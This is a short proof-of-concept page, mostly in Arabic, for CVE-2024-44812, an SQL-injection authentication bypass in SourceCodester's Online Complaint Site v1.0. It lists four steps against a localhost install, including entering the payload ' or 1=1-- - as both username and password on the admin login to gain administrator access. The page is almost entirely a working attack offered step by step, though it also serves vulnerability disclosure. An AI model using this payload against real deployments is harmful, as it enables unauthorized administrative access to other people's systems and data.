
إثبات المفهوم لاستغلال ثغرة CVE-2024-44812 - تجاوز المصادقة عبر حقن SQL في موقع الشكاوى الإلكتروني v1.0
SourceCodester
https://www.sourcecodester.com/php/14717/online-complaint-site-using-phpmysqli-full-source-code.html
ثغرة حقن SQL في موقع الشكاوى عبر الإنترنت الإصدار 1.0 تسمح لمهاجم عن بعد بتصعيد الصلاحيات عبر معاملات اسم المستخدم وكلمة المرور في مكون /admin.index.php.
إثبات مفهوم استغلال CVE-2024-44812 - ثغرة تجاوز المصادقة عبر حقن SQL في موقع الشكاوى عبر الإنترنت الإصدار 1.0
Step 1 – Visit http://localhost/complaintsite/
Step 2 – Click on "admin" button and redirect on login page.
Step 3 – Enter username as ' or 1=1-- - and password as ' or 1=1-- -
Step 4 – Click Login and now you will be logged in as admin.